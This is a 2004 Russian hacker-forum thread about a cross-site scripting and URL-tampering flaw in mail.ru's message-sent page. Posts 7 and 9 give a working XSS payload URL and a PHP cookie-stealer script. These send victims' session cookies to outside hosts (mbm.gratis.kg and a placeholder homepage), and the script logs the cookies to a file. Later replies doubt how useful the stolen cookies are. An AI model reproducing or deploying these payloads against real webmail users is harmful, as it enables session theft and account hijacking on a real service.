ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.06.2004, 17:11
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

Для чрезмерно категоричных в отношении "100%-ного взлома за деньги" товарищей))
Чтобы проникунцца нужной атмосферой, повторяйте все по порядку.
1) заходим на http://mail.ru , вводим свой логин, домен (к примеру yourmail@mail.ru), пароль и заходим в почту
2) Жмем "написать письмо". Адресатом указываем любой мэйл, можнол и самого себя - yourdomain@mail.ru, и нажимаем "отправить".
3)Появляется страница с сообщением "ваше письмо для yourmail@mail.ru (<ТЕМА&gt отправлно.
4) Смотрим в адресную строку браузера. Там много параметров, находим:
....&user=yourmail@mail.ru&....
5)меняем yourmail@mail.ru на нудный mail'овский адрес и жмем ввод.
6)Смеемся вместе))

Думаю смысл вышеизложенной басни понятен))
 
Ответить с цитированием

  #2  
Старый 14.06.2004, 17:38
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

Гыгы, прикольно ...
Тока бесполезно ... )
 
Ответить с цитированием

  #3  
Старый 14.06.2004, 17:40
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

Мона еще http://www.mail.ru/sendmsgok?To= .... и ... Subject= поменять ...
 
Ответить с цитированием

  #4  
Старый 14.06.2004, 17:57
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

там вроде все менять можно..
Я не силен в cgi-bug, поэтому не знаю, а вдруг что-то и посерьезнее можно сделать)
 
Ответить с цитированием

  #5  
Старый 14.06.2004, 18:20
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

Да не думаю ...
Правда в 2000 году, говорят, был один баг, позволяющий узнать секретный вопрос к любым ящикам ...
 
Ответить с цитированием

  #6  
Старый 14.06.2004, 19:22
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

про взлом в 2000-ном
читал), у меня еще тогда в помине компа не было.. там другого плана. В скрытом поле пароль почему-то передавался, даже если на серкетный вопрос не правил ньо ответишь.
А здесь, я имел ввиду, что вдруг можно внедрить какую-нибудь команду) JS можно же вставлять, попробуй user=< script>alrt()</script>
 
Ответить с цитированием

  #7  
Старый 15.06.2004, 19:17
Аватар для mynhauzen
mynhauzen
Новичок
Регистрация: 13.06.2004
Сообщений: 13
Провел на форуме:
0

Репутация: 0
По умолчанию

не знаю, может уже знаете давно:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.mail.ru/sendmsgok?Subject=KPbIC&amp;From=&amp;user=myiworm @mail.ru&amp;TotalUnread=Куча&amp;ReturnPath=w in.mail.ru/session/&amp;To=<Form%20name=mailru%20Action="http://mbm.gratis.kg/mail.php"%20Method="POST"><input%20type=hidden%20n ame=param> </Form> &lt; script> mailru.param.value=document.cookie;mailru.submit() ;</Script> [/QUOTE]<span id='postcolor'>

потом http://mbm.gratis.kg/cookie
 
Ответить с цитированием

  #8  
Старый 16.06.2004, 00:02
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

А зачем так?)
можно то же самое, но встроенное в тело письма, которое посылаешь
 
Ответить с цитированием

  #9  
Старый 16.06.2004, 09:57
Аватар для mynhauzen
mynhauzen
Новичок
Регистрация: 13.06.2004
Сообщений: 13
Провел на форуме:
0

Репутация: 0
По умолчанию

ну да, вот то же скриптик:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><?
if($cookie){
$open=fopen('cookie.htm','a+');
&nbsp;fwrite($open,"<li>".$cookie."<br>");
fclose($open);
Header("Location: http://www.mail.ru");
}
else{
Header("Location: http://www.mail.ru/sendmsgok?Subject=fun&amp;From=anyname&amp;user=xx x@mail.ru&amp;TotalUnread=0&amp;ReturnPath=win.mai l.ru/session/&amp;To=&lt; script>document.location.href=\"http://yourhomepage.ru/test/cookie.php?cookie=\"+document.cookie;</script>");
}
?>[/QUOTE]<span id='postcolor'>

только что толку от этого? я так и не понял... ну есть у меня кукисы чужие, и что дальше?
 
Ответить с цитированием

  #10  
Старый 16.06.2004, 16:28
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mynhauzen @ июня 16 2004,09:57)</td></tr><tr><td id="QUOTE">только что толку от этого? я так и не понял... ну есть у меня кукисы чужие, и что дальше?[/QUOTE]<span id='postcolor'>
Надо у Алгола спросить, он в этом хорошо разбирается, видишь, пишет что в этих куках пароля нет. Да и вообще, навряд ли ты сделаешь что -нибудь, если ты не знал, куки тоже не будут рабочими, если нажата кнопка &quot;выход&quot;. В конце-концов, поэксперементируй со своими файлами
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ